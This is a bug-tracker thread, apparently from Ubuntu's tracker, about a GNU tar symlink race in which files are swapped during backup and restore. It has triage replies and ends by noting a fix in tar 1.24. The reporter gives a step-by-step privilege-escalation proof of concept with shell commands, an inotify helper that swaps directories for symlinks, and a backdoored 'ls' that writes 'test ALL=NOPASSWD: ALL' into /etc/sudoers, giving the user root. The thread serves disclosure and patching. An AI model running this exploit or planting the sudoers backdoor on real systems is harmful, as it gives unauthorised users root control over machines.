Tar allows inclusion of arbitrary files in backup

Checked restore, following script will add a /bin/bash2 binary.

#!/bin/sh
mkdir -p root/adir
dd if=/dev/zero bs=1M count=100 of=root/adir/afile

mkdir root/bin
cp -a /bin/bash root/bin/bash2

echo "Wait for backup run, press any key ..." >&2
read xxxvar

echo "Waiting for event .." >&2
./DirModifyInotify "root/" "root" "/"

I'm assuming you are talking about using '-h' along with '--update', in which case, I am not sure I see this as a security vulnerability. If someone is running tar backups as root, then he/she must be careful about what to copy and there is no information disclosure because it is root that is performing the backup. Not dereferencing symlinks is the normal way to do that-- check if the files are newer will always fail if the symlink is new-- since the files presumably don't exist in the original archive. If you are not running the backup as root, then normal unix permissions should protect from information disclosure.

I am going to mark this as Invalid for now. If you are talking about something else, please reopen as 'New' and explain the issue in detail with steps to reproduce.

I misread your report initially (I missed your reproducer entirely) -- sorry.

As I understand it, the problem isn't so much about backup (a user doesn't really need this TOCTOU condition in the vast majority of situations, since most backups are automatic-- ie, no one would really notice/care about the symlink somewhere in the user's directory). However, restore does seem to be an issue because the TOCTOU does seem to be a problem-- ie an admin could review the tarball and see that it looks fine, then run it and get into trouble. This requires more investigation.

It seems your report is a variant on http://<email address hidden>/msg00284.html. Specifically, when not using '--no-overwrite-dir' users are vulnerable to these sorts of symlink issues. Upstream said in the report tar is designed this way to be compatible with other implementations.

halfdog, does your PoC work when using '--no-overwrite-dir' to unpack?

No, it is not about the -h option and symlink dereferencing in the last element of a path. This method makes tar dereference symlinks undetected in an higher path level (not the last level), e.g. when dealing with file /home/user/tmp/etc/sshd/, the dereference might occur with the element [etc] (see POC.tar.bz2 from initial report. test.sh can be run as [user]). All new and update checks will fail, since tar is not knowning that it is following a symlink, so the user has full control, which files are included in his backup, even when file is not accessible by him. Until now, there is no real damage done (unless the user included / over and over again, thus leading to DOS of backup infrastructure), because info has not leaked yet.

The same is true during restore, leading to overwrite of arbitrary files. Just run the script from note 2010-04-26 as user [anyuser] in his home directory.

Here is an example how to replace "ls" with a backdoored variant during a backup/restore cycle of /home/test. The user to run a command is given in front of every command. Use two parallel shells, since the user has to be logged in during restore !!!!!!!!

Create user "test" (our bad user):

root# useradd test --gid users
root# mkdir /home/test
root# chown test.users /home/test

Login as user "test", extract poc from initial note (end with Ctrl-D):

test# base64 -d | tar -xjv

Compile the helper:

test# gcc -o DirModifyInotify DirModifyInotify.c

Prepare the user directory for the nightly backup job (all run as user test)

cd /home/test
mkdir -p root/adir
dd if=/dev/zero bs=1M count=1 of=root/adir/afile
mkdir root/bin
cat <<EOF > root/bin/ls
#!/bin/bash
test -r /etc/shadow && echo "test ALL=NOPASSWD: ALL" >> /etc/sudoers
exec /bin/ls2 "\$@"
EOF
chmod 0755 root/bin/ls
cp -a /bin/ls root/bin/ls2

Run nightly backup as root, this will run 100% as expected, producing a standard user home dir backup

root# tar -C / -cvf /test.dump ./home/test/

Run trap commands as user test in /home/test:

test# rm -rf root/bin
test# echo "Waiting for event .." >&2
test# ./DirModifyInotify "root/" "root" "/"

Restore backup as root:

root# tar -C / -xvf /test.dump ./home/test/

Run "ls" as root, giving full root permissions to user "test" since backdoored ls will add password-less sudo for user test

root# ls

Perform sudo -s /bin/bash to get root

test# sudo -s /bin/bash

Done

Sorry, was composing last note while your were answering.

Tested with restore:

 tar -C / -xvf /test.dump --no-overwrite-dir ./home/test/

Gives root shell also

From my point of view, backup generation this way is also problematic. When admin does not examine backup tarball closely, it might look like a user home, where a user has exploded some /etc backup from any machine (his private one?) for testing purpose. If restore process is done in a way to change permissions of restored files to user automatically, that would make a root readonly ssh host key a standard user readonly file in his home directory.

More trouble when backup runs on central user server, where all home dirs resides. One user is logged on and has one homedir mounted via NFS (including symlinks). With the 10-20% statistical flip algorithm, he might include files from the central user storage server in his own backup, since tar runs in context of server, not user PC.

Has ubuntu security team in their role as cve CNA already assigned a CVE ID to this class of issues? Since the nearly identical issues effects other products and vendors too, a common identifier might be helpful. Maybe cert has already done so and communicated the id to ubuntu team, but not me?

The read timerace was fixed in gnu tar release 1.24

This is public now.

This was fixed in 1.25-3. http://git.savannah.gnu.org/cgit/tar.git/plain/NEWS?id=release_1_24